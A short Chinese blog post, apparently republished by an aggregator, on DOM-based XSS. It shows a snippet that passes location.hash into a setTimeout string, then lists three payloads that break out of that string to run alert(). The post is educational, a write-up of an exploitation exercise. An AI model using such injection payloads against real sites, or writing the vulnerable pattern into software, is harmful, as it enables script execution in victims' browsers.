XSS之锚点
Posted 镜花水月
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了XSS之锚点相关的知识,希望对你有一定的参考价值。
今天P师傅发了一个XSS链接,让利用一下,源码如下
<script type="text/javascript"> var x=location.hash; function aa(x){}; setTimeout("aa(‘"+x+"‘)",100); </script>
然后看了下setTimeout这个函数,用法如下:
语法
setTimeout(code,millisec)
| 参数 | 描述 |
|---|---|
| code | 必需。要调用的函数后要执行的 JavaScript 代码串。 |
| millisec | 必需。在执行代码前需等待的毫秒数。 |
带入函数可以成功执行的几个函数如下:
setTimeout("aa(‘‘,alert(1),‘‘)",1000);
setTimeout("aa(‘‘,alert(2))//‘)",1000);
setTimeout("aa(‘‘);alert(3);eval(‘‘)",1000);
以上是关于XSS之锚点的主要内容,如果未能解决你的问题,请参考以下文章
是否有标准或首选标签类型可用于向某个位置添加额外的锚点/片段链接?
URL中的锚点(fragment片段标识符)是什么?(hash mark(#))(HTML 页面内定位)(之前学html不是学了吗?忘啦?)(SEO 搜索引擎优化)